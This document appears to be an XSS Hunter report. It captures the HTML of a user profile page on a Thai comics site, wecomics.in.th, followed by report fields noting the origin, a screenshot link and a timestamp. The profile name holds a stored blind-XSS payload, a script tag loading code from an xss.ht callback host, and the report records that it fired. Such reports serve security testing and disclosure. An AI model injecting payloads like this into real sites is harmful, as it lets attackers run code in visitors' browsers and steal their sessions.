                <div class="column active">
                    <a title="โปรไฟล์" href="/profile/20559376/script-src-https-enwuft-xss-ht-script">
                        โปรไฟล์
                    </a>
                </div>
                <div class="column">
                    <a title="การ์ตูน" href="/portfolio/comics/20559376/script-src-https-enwuft-xss-ht-script">
                        ผลงาน
                    </a>
                </div>
                    <div class="column">
                        <a title="โปรไฟล์" href="/dashboard/20559376/script-src-https-enwuft-xss-ht-script">
                            ระบบสนับสนุน
                        </a>
                    </div>
            </div>
        </div>
    </div>
</div>
<div class="oc-content">
    <div class="oc-container oc-segment">
        <div class="ui centered grid">
            <div class="column thirteen wide computer sixteen wide tablet sixteen wide mobile">
                <div class="user-profile center-cropped" style="background-image: url('https://image.wecomics.in.th/user/20559376/cover-637143144902058587.png');background-color:#3f3f3f;background-position: center center;background-size: 100% auto;">
                    <div class="ui two column center aligned grid">
                        <div class="column oc-padding-0em" style="width:30%;display: flex;justify-content: center;">
                            <div class="avartar avatar-profile lazy lazy-loader" data-src="https://image.wecomics.in.th/user/20559376/637143143238075104.jpg">
                                <img src="/images/icon/tranparent/20x20.png">
                            </div>
                        </div>
                        <div class="column" style="width:70%;align-self: center">
                            <div class="oc-text-left id-profile font-wight-300" style="color:white">
                                ID : 20559376
                            </div>
                            <div class="title oc-text-single-line title-profile" style="color:white!important;text-align:left!important">
                                "&gt;&lt;script src=https://enwuft.xss.ht&gt;&lt;/script&gt;
                            </div>

                        </div>
                    </div>
                    <div class="ui centered grid">
                        <div class="column seven wide computer sixteen wide tablet sixteen wide mobile oc-padding-0em">
                            <div class="oc-text-center">
                                    <div class="profile-wallet" id="profile-wallet">
                                        <div class="coin profile-wallet-coin">
                                            <img class="icon" src="/images/icon/pang-coin.png?v=TXNvuXNJux3pBRU2m8tafA62TgUw3EtEEESZdmI3TR4" alt="">
                                            <span class="value">0</span>
                                            <a href="/payment/topup" title="เติมเหรียญ">
                                                <img class="icon plus" src="/images/icon/plus-gray.png?v=mztoSexWYCjVNPGNMUUvpCQEs4iIj47sSXeutFZNrmo" alt="">
                                            </a>
                                        </div>
                                        <div class="key profile-wallet-key">
                                            <img class="icon" src="/images/icon/pang-key.png?v=eOEeXrGBFAHonmXJL2JI82Ushad7Bh1hzIzp_UfNrYo" alt="">
                                            <span class="value">0</span>
                                        </div>
                                    </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="oc-text-center">
                        <a class="text-orange" href="/user/settings/profile">
                            <div class="oc-button-comics-color fluit">แก้ไขโปรไฟล์</div>
                        </a>
                </div>
                <div class="oc-text-center oc-padding-1em " style="color:#d4d4d5;padding-bottom:0em!important">
                    เข้าร่วม September 10, 2019
                </div>
            </div>
            <div class="column thirteen wide computer sixteen wide tablet sixteen wide mobile">
                <div class="user-content">
                    <div class="ui grid">
                        <div class="column computer tablet sixteen wide mobile">
                            <div class="detail">
                                <div class="follow">
                                    <a class="followers" href="/user/20559376/followers">
                                        <span class="number follow-count">0</span> ผู้ติดตาม
                                    </a>
                                    <a class="followings" href="/user/20559376/followings">
                                        <span class="number">0</span> กำลังติดตาม
                                    </a>
                                </div>
                                <div class="description">
                                    
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="user-ownership">

                    <div class="comic oc-hidden">
                        <div class="header oc-padding-bottom-0em">
                            ชั้นหนังสือ (0)
                        </div>
                        <div class="subheader">
                        </div>
                        <div class="content">
                        </div>
                    </div>
                </div>
                <div class="user-comment comment-section" data-id="20559376" data-type="users" data-count-comment="0">
                    <div class="ui mini modal modal-comment-delete">
    <div class="header">
        ยืนยันที่จะลบ
    </div>
    <div class="content">
        <p>ข้อมูลจะถูกนำออกทำให้ไม่สามารถอ่านได้อีกน่าเสียดายมากเลย</p>
        <p>แน่ใจแล้วหรือที่ต้องการลบข้อมูลออก<br>หากยืนยันแล้วจะไม่สามารถกู้คืนมาได้อีกนะ!</p>
    </div>
    <div class="actions">
        <div class="ui approve button red">ยืนยันที่จะลบ</div>
        <div class="ui cancel button">ยกเลิก</div>
    </div>
</div>
<div class="comment-box">
    <div class="comment-input">
        <div class="comment-avatar profile avartar" style="background-image: url(&quot;https://image.wecomics.in.th/user/20559376/637143143238075104.jpg?w=300&quot;);">
            <a href="javascript:;">
                <img src="/images/icon/tranparent/20x20.png?v=lNCszvPpVSa1-tKJJhLFoLdEjDCgbZu78B9gkptv-lA">
            </a>
        </div>
        <div class="ui fluid action input">
            <input class="message" type="text" placeholder="พิมพ์ข้อความ..." maxlength="500">
            <div class="ui button">ส่ง</div>
        </div>
    </div>
</div>
<div class="comment-box">
    <div class="comment-title">
        ความคิดเห็น (<span class="counter-comment">0</span>)
    </div>
    <div class="comment-container" style="display: none;">
        <ul id="comment-list" class="comment-list">
        </ul>
        <button class="fluid big ui button hide oc-button color-e comment-load-more" data-id="20559376" data-offset="0" data-length="10" style="display: none;">โหลดเพิ่มเติม</button>
    </div>
    <div class="data-not-found" style="display: block;">
        <div class="oc-notfound">
</div>

    </div>
</div>

                </div>
            </div>
        </div>
    </div>
</div>
<input id="userId" type="hidden" value="20559376">

        </div>
        <footer id="oc-footer">
            <div class="oc-footer oc-hidden-sm-down">
                <div class="ui container equal width grid">
                    <div class="middle aligned row">
                        <div class="left floated left aligned sixteen wide mobile ten wide tablet eight wide computer eight wide widescreen column oc-padding-left-0em">
                            <p class="social-us">
                                <span class="text">
                                    ติดตามเราได้ที่
                                </span>
                                <a href="https://www.facebook.com/wecomicsTH/"><img class="ui middle aligned mini image icon" src="/images/icon/iconSocial.png?v=ru8x_lt2-ka2GbeGwDA5a5z4vwEuzYBxljhfvpoaVv8" alt="social"></a>
                                <a href="https://twitter.com/WeComicsTH"><img class="ui middle aligned mini image icon" src="/images/icon/iconSocial-1.png?v=iz4h3NCvdLsgfPnQxn7AFX8J9JtuTaVb4AT6TyHZ8wo" alt="social"></a>
                                <a href="https://www.youtube.com/channel/UCDe0apC-kUpfcnHlzDfNlPg"><img class="ui middle aligned mini image icon" src="/images/icon/iconSocial-2.png?v=cxmIImTzkXlnlbOdn9ACphuyOsbAqT9vo5y_FuFIPUU" alt="social"></a>
                                <a href="https://www.instagram.com/wecomicsTH"><img class="ui middle aligned mini image icon" src="/images/icon/iconSocial-7.png?v=bZhG2yVnivPeJjF2zXBafDW1d6uB6aOZge-7ejab2q4" alt="social"></a>
                            </p>
                            <p class="link-text">
                                <a class="word-break" href="/privacy-policy">นโยบายความเป็นส่วนตัว</a> |
                                <a class="word-break" href="/terms-of-use">ข้อกำหนดการใช้งาน</a> |
                                <a class="word-break" href="/faq">คำถามที่พบบ่อย</a>
                            </p>

                        </div>
                        <div class="right floated right aligned sixteen wide mobile six wide tablet eight wide computer eight wide widescreen column oc-padding-right-0em">
                            <script src="https://www.trustmarkthai.com/callbackData/initialize.js?t=835d-27-5-b5c65a5a2599aec4fc072bf78071737abba316811" id="dbd-init"></script><div id="Certificate-banners"><a title="กรมพัฒนาธุรกิจการค้า Trustmarkthai" style="padding-left: 5px;" href="javascript:void(0);" onclick="open_popup(&quot;https://www.trustmarkthai.com/callbackData/popup.php?data=835d-27-5-b5c65a5a2599aec4fc072bf78071737abba316811&amp;markID=firstmark&quot;);"><img alt="กรมพัฒนาธุรกิจการค้า Trustmarkthai" src="https://www.trustmarkthai.com//trust_banners/bns_registered.png"></a>
</div>
                            <p class="copyright-text">สงวนลิขสิทธิ์ <i class="copyright icon oc-margin-0em" style="font-size:0.7em;"></i> บริษัท วีคอมมิคส์ จำกัด</p>
                        </div>
                    </div>
                </div>
            </div>
            <style>
                .cover-img-footer-mobile {
                    position: relative;
                }

                .download-app-mobile {
                    position: absolute;
                    bottom: 8px;
                    right: 16px;
                }

                .icon-size-footer {
                    width: 40%;
                }
            </style>
            <!--Footter mobile-->
        </footer>
    </div>
    
    
        
    
    
        <link href="/css/components/profile.min.css?v=4l4SdbJdSQnxHhK77Kb7Z4d0h2RFN3lS4hqpI0Q4-uc" rel="stylesheet">
    

        <script type="text/javascript" src="https://unpkg.com/default-passive-events"></script>
        <script type="text/javascript" src="/js/lib/imageMapResizer.min.js?v=DR186bOg2VbFxLleTdmTjlKktKhP08AHo08h480JZCA"></script>
        <script type="text/javascript">
            $('map').imageMapResize();
        </script>
        <script src="/js/site.min.js?v=DdhYSkPBQPB7rkGS4LFIr9wW6g7hwRM09qUPJvSdJ1M"></script>
        <script src="/lib/timeago/locales/jquery.timeago.th.js?v=46n3qedBEqGuzik19o4y-df2AfnKzVleB4qCoUu1J1k"></script>
        
    
    
        <script src="/lib/jsrender/jsrender.min.js?v=7Vqjxcqfhed43wX6gmakQyMQ6Ha-pARsHDhwPJhfGN0"></script>

        <script src="/js/users/profile.min.js?v=lDXTVF_n53iLvcKec2rzShjJUunEIFqJ-ed8Td7Oe9s"></script>
    

    


<iframe width="1366" height="675" scrolling="no" style="visibility: hidden; position: absolute; top: -10000px; left: -10000px;"></iframe></body></html>
Injection Point (Raw HTTP Request)
Could not correlate XSS payload fire with request!
Origin

https://www.wecomics.in.th

HTML5 Canvas-Rendered Screenshot

https://api.xsshunter.com/uploads/xsshunter_screenshot_a04bbc1b3cfc31543a7015e397fd8eb0ac7733fc161a37f8e0ffa0c5158aa76d2d217dfb7fbf0daa796295bbddfc8ff39755865bf2fe1fe776c0fbd88307975f722a297da7cb9d48357218fbfde233cb7a49620ee6a764ec7710912c78a1319ec307d0d1.png

Injection Timestamp

1578717955

Remediation

For more information about Cross-site Scripting and remediation of the issue, see the following resources:

This report was generated by the service hosted at XSSHunter.com.